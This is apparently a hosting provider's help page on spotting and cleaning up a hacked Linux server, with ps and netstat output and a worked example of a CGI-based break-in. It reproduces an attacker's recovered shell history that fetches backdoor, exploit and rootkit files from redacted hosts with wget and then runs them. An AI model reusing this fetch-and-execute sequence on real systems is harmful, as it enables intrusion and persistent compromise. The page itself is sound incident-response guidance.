Search


print PDF
Hacked machine

It doesn't only happen to others.

How to see that a machine is hacked?

By having a look at MRTG, you can't go wrong:





And on the machine, we find:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


Obviously, the hacker has been able to launch softs in root. The machine is thus hacked and must be re-installed.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


It exist launched softs, which have a pid and that are not seen by ps, surely due to the fact that ps has been replaced by a hacked ps that filters all softs of the hacker in order to trick the eye.

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!

We immediately stop the machine.

We can have the chance to have a SemiHackedMachine.

An other experience: HackedMachineExample..

Why is the machine hacked?

The origin of the problems are multiple, but we can sum up it as follows:
you are not paranoid.

You use telnet. Your login and password travel via Internet and they can be 'stolen' at any time. You must use SSH. Here is a manual about it: SshOnDedicated.

You use FTP, your login and password travel on Internet and it's the same root password. Sftp is your solution.

You use pop3/imap with the password and it's the root password. Use APOP or POP3S/IMAPS. Here is a manual about it: SmtpPop3Imap.

If you don't update your server with releases ReleasePatch, your risk easy hack (about 250 scans are carried out a day on our network in order to detect security faults).

What to do?

If your server is hacked, it will be placed into a Rescue mode that only has FTP Read Only access, automatically you will receive your access code by email.

You can then submit an incident ticket to ask for your machine to be placed in Rescue mode. You will have to explain your request and your commitment to correct before reactivation of your server. We will be vigilant to the fact that you have to fix the flaws before putting the server back online on the network in (HDD mode).


Hack examples

1. CGI script fault

Symptoms

A g00dies.tgz file uploaded in /tmp with other files: x, k, etc...
The x program is a backdoor, if it's launched, it gives access to the server.

We have found the bash.history of nobody user in /tmp, here is the content:

cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Comments

Thanks to it, we can notice that commands have been placed as nobody, but this user is mainly used by Apache. It looks like the hacker benefited from a vulnerability of a CGI script.

Resolution

- Killer all suspected process in progress.
The hacker is obviously not in root (it could actually benefit from a kernel default <2.4.24);
However, we make some basic operations/verifications:

  • Change all passwords: root, user, mysql, mail, etc... (we can see that the hacker has launched mingetty)
  • Search for files, which have been modified since the hack: find /rep -cmin -60 (check all files modified for less than one hour).

- Consult then Apache logs at about the time the hack happened to find the suspected script.